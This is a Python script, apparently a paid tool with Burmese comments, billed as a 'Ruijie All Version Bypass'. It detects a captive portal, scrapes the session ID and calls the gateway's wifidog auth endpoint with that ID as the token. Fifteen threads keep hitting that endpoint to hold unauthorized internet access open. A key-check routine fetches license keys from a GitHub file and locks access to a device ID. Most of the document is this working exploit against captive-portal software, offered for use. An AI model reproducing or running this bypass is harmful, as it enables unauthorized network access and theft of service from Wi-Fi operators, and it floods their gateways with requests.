import requests
import re
import urllib3
import time
import threading
import logging
import random
import os
import json
import socket
import subprocess  # ဒီကောင်လေး ကျန်ခဲ့လို့ မှားနေတာပါ၊ အခု ပြန်ထည့်ပေးထားပြီ
from datetime import datetime
from urllib.parse import urlparse, parse_qs, urljoin

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# ===============================
# ⚙️ CONFIG & DATABASE
# ===============================
VALID_KEYS_URL = "https://raw.githubusercontent.com/Zyan091/my-database/main/key.txt"
LOCAL_DB = ".zyan_vault.json"
PING_THREADS = 15
MIN_INTERVAL = 0.001
MAX_INTERVAL = 0.01
DEBUG = False

# COLORS
R = "\033[91m"; G = "\033[92m"; C = "\033[96m"
Y = "\033[93m"; M = "\033[95m"; GD = "\033[38;5;220m"; RS = "\033[0m"

stop_event = threading.Event()

# ===============================
# 🔑 SECURITY ENGINE (Zyan's Request)
# ===============================
def get_hwid():
    try:
        # Termux user identity ကို ယူပြီး ID ထုတ်ခြင်း
        user_id = subprocess.check_output('whoami', shell=True).decode().strip()
        return f"ZYAN-{user_id.upper()}-PRO"
    except:
        return "ZYAN-DEVICE-USER"

def verify_access():
    my_id = get_hwid()
    today = datetime.now().date()

    # ၁။ Offline Login Check (Internet မလိုဘဲ နောက်တစ်ခါ တန်းပွင့်ရန်)
    if os.path.exists(LOCAL_DB):
        try:
            with open(LOCAL_DB, 'r') as f:
                saved = json.load(f)
                exp_date = datetime.strptime(saved['exp'], "%Y-%m-%d").date()
                if saved['id'] == my_id and today <= exp_date:
                    print(f"{G}[✓] ACCESS VERIFIED (Offline Mode){RS}")
                    time.sleep(1)
                    return True
                else:
                    os.remove(LOCAL_DB)
        except:
            if os.path.exists(LOCAL_DB): os.remove(LOCAL_DB)

    # ၂။ Online Activation (ပထမဆုံးအကြိမ် သို့မဟုတ် သက်တမ်းကုန်လျှင်)
    os.system('clear')
    print(f"{C}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━{RS}")
    print(f"{GD}   ZYAN NETWORK PREMIER - SECURITY SYSTEM{RS}")
    print(f"{C}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━{RS}")
    print(f"DEVICE ID: {GD}{my_id}{RS}")

    u_key = input(f"\nENTER ACCESS KEY: {GD}").strip()
    if not u_key: return False

    print(f"{Y}[*] Connecting to database...{RS}", end="\r")
    try:
        # Cache မငြိအောင် time.time() ထည့်ထားသည်
        r = requests.get(f"{VALID_KEYS_URL}?t={time.time()}", timeout=15)
        if r.status_code == 200:
            for line in r.text.splitlines():
                if "|" in line:
                    k, i, d = [p.strip() for p in line.split("|")]
                    if u_key == k and i == my_id:
                        exp_date = datetime.strptime(d, "%Y-%m-%d").date()
                        if today <= exp_date:
                            with open(LOCAL_DB, 'w') as f:
                                json.dump({'key':k, 'id':i, 'exp':d}, f)
                            print(f"\n{G}✅ ACCESS GRANTED! (EXP: {d}){RS}")
                            time.sleep(2)
                            return True
                        else:
                            print(f"\n{R}❌ THIS KEY HAS EXPIRED! ({d}){RS}")
                            return False
            print(f"\n{R}❌ INVALID KEY OR ID MISMATCH!{RS}")
        else:
            print(f"\n{R}❌ SERVER ERROR: {r.status_code}{RS}")
    except:
        print(f"\n{R}❌ NETWORK ERROR! Online Activation Required.{RS}")
    return False

# ===============================
# 🚀 CORE LOGIC (မူရင်းအတိုင်း မထိခိုက်စေရ)
# ===============================
def check_real_internet():
    try:
        return requests.get("http://www.google.com", timeout=3).status_code == 200
    except: return False

def banner():
    print(f"""{M}
╔══════════════════════════════════════════════════════╗
║        Ruijie All Version Bypass - ZYAN ELITE        ║
║        Engine Status: {G}STABLE{M} / Mode: {G}TURBO{M}           ║
╚══════════════════════════════════════════════════════╝
{RS}""")

def high_speed_ping(auth_link, sid):
    session = requests.Session()
    headers = {'User-Agent': 'Mozilla/5.0 (Linux; Android 11)'}
    while not stop_event.is_set():
        try:
            session.get(auth_link, headers=headers, timeout=5)
            print(f"{G}[✓]{RS} SID {sid[:10]} | {GD}Pulse Active{RS} 🔥       ", end="\r")
        except: break
        time.sleep(random.uniform(MIN_INTERVAL, MAX_INTERVAL))

def start_process():
    banner()
    logging.info(f"{C}Initializing Turbo Engine...{RS}")

    while not stop_event.is_set():
        session = requests.Session()
        test_url = "http://connectivitycheck.gstatic.com/generate_204"

        try:
            r = requests.get(test_url, allow_redirects=True, timeout=5)

            if r.url == test_url:
                if check_real_internet():
                    print(f"{Y}[•]{RS} Internet Active... Monitoring      ", end="\r")
                    time.sleep(5); continue

            portal_url = r.url
            parsed_portal = urlparse(portal_url)
            portal_host = f"{parsed_portal.scheme}://{parsed_portal.netloc}"

            print(f"\n{C}[*] Captive Portal Detected: {portal_url}{RS}")

            # မူရင်း Redirect Logic
            r1 = session.get(portal_url, verify=False, timeout=10)
            path_match = re.search(r"location\.href\s*=\s*['\"]([^'\"]+)['\"]", r1.text)
            next_url = urljoin(portal_url, path_match.group(1)) if path_match else portal_url
            r2 = session.get(next_url, verify=False, timeout=10)

            # SID Capture
            sid = parse_qs(urlparse(r2.url).query).get('sessionId', [None])[0]
            if not sid:
                sid_match = re.search(r'sessionId=([a-zA-Z0-9\-]+)', r2.text)
                sid = sid_match.group(1) if sid_match else None

            if sid:
                print(f"{G}[✓]{RS} Session ID Captured: {GD}{sid}{RS}")
                params = parse_qs(parsed_portal.query)
                gw_addr = params.get('gw_address', ['192.168.110.1'])[0]
                gw_port = params.get('gw_port', ['2060'])[0]

                auth_link = f"http://{gw_addr}:{gw_port}/wifidog/auth?token={sid}&p={random.randint(111,999)}"

                for _ in range(PING_THREADS):
                    threading.Thread(target=high_speed_ping, args=(auth_link, sid), daemon=True).start()

                while check_real_internet():
                    time.sleep(10)
            else:
                print(f"{R}[!] SID NOT FOUND. RETRYING...{RS}")
                time.sleep(5)

        except Exception as e:
            if DEBUG: logging.error(f"{R}Error: {e}{RS}")
            time.sleep(5)

if __name__ == "__main__":
    try:
        if verify_access():
            start_process()
    except KeyboardInterrupt:
        stop_event.set()
        print(f"\n{R}🛑 Engine Shutdown Safe.{RS}")
